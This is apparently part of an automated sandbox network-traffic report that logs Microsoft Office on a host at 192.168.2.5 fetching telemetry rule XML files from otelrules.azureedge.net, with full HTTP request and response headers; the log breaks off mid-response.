                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                ETag: "0x8DC582BE5B7B174"
                                                                                x-ms-request-id: 9bed7ce1-001e-0046-4f8c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc554w2fgapsyvy8ua00000000bw0000000003wv7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1366               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                124         192.168.2.5  55571        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB866CDB"
                                                                                x-ms-request-id: b2395a75-501e-005b-038c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55qkvj6n60pxm9mbw00000001kg00000000215w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1403               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                125         192.168.2.5  55575        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                ETag: "0x8DC582BE976026E"
                                                                                x-ms-request-id: 7baaa16d-b01e-0097-4d8c-154f33000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009cc2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1399               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                126         192.168.2.5  55581        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1415
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                ETag: "0x8DC582BE7C66E85"
                                                                                x-ms-request-id: 42bb1403-701e-005c-578c-15bb94000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55whfstvfw43u8fp40000000cbg00000000ac7q
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1415               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                127         192.168.2.5  55579        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1425
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE6BD89A1"
                                                                                x-ms-request-id: 89fd37a1-501e-008f-6d8c-159054000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc552g4w83buhsr3htc0000000cag00000000679v
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1425               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                128         192.168.2.5  55578        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                ETag: "0x8DC582BDC13EFEF"
                                                                                x-ms-request-id: 819d44cb-f01e-0020-6f8c-15956b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55qdcd62bsn50hd6s0000000c1g000000008xw4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1362               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                129         192.168.2.5  55580        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:14 UTC  192                OUT        GET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1388
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                ETag: "0x8DC582BDBD9126E"
                                                                                x-ms-request-id: 9c5056bf-f01e-0003-548c-154453000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55dtdv4d4saq7t47n0000000c1g000000008vgk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC  1388               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                130         192.168.2.5  55584        13.107.246.60   443
                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                2024-10-04 09:34:15 UTC  192                OUT        GET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:15 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1378
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                ETag: "0x8DC582BDB813B3F"
                                                                                x-ms-request-id: be019976-401e-0035-5d8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55sdcjq8ksxt4n9mc00000001kg000000009nmh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:15 UTC  1378               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                131 | 192.168.2.5 | 55586 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:15 UTC | 192 | OUT | GET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1405
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                ETag: "0x8DC582BE89A8F82"
                                                                                x-ms-request-id: 56c891cb-f01e-0085-428c-1588ea000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55n4msds84xh4z67w000000060g000000006cvr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1405 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                132 | 192.168.2.5 | 55593 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:15 UTC | 192 | OUT | GET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1415
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                ETag: "0x8DC582BDCE9703A"
                                                                                x-ms-request-id: 5f7380a8-801e-0015-7b8c-15f97f000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc5546rn6ch9zv310e0000000056g00000000a8fb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1415 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                133 | 192.168.2.5 | 55592 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:15 UTC | 192 | OUT | GET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1368
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE51CE7B3"
                                                                                x-ms-request-id: 2f845d93-b01e-0070-2f8c-151cc0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55472x4k7dmphmadg0000000c40000000000g9m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1368 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                134 | 192.168.2.5 | 55591 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:15 UTC | 192 | OUT | GET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1378
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE584C214"
                                                                                x-ms-request-id: b612907a-401e-008c-278c-1586c2000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55w69c2zvnrz0gmgw0000000ckg0000000057cy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1378 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                135 | 192.168.2.5 | 55599 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:16 UTC | 192 | OUT | GET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1407
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE687B46A"
                                                                                x-ms-request-id: 2d1829d7-b01e-001e-738c-150214000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55tsfp92w7yna557w0000000cag000000006hge
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1407 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                136 | 192.168.2.5 | 55602 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:16 UTC | 192 | OUT | GET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE156D2EE"
                                                                                x-ms-request-id: 36a1620f-001e-0028-0f8c-15c49f000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55d6fcl6x6bw8cpdc0000000cag00000000185p
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1397 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                137 | 192.168.2.5 | 55601 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:16 UTC | 192 | OUT | GET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1370
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                ETag: "0x8DC582BDE62E0AB"
                                                                                x-ms-request-id: be019a9f-401e-0035-518c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55whfstvfw43u8fp40000000ceg000000006a5k
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1370 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                138 | 192.168.2.5 | 55603 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:16 UTC | 192 | OUT | GET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                ETag: "0x8DC582BEDC8193E"
                                                                                x-ms-request-id: e360128a-801e-0083-498c-15f0ae000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55dtdv4d4saq7t47n0000000c6g000000001vfu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1360 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                139 | 192.168.2.5 | 55604 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:16 UTC | 192 | OUT | GET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1406
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB16F27E"
                                                                                x-ms-request-id: 4b0a4db7-c01e-00ad-2d8c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55tsfp92w7yna557w0000000cbg000000005866
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC | 1406 | IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                140 | 192.168.2.5 | 55605 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:17 UTC | 192 | OUT | GET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:17 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1369
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
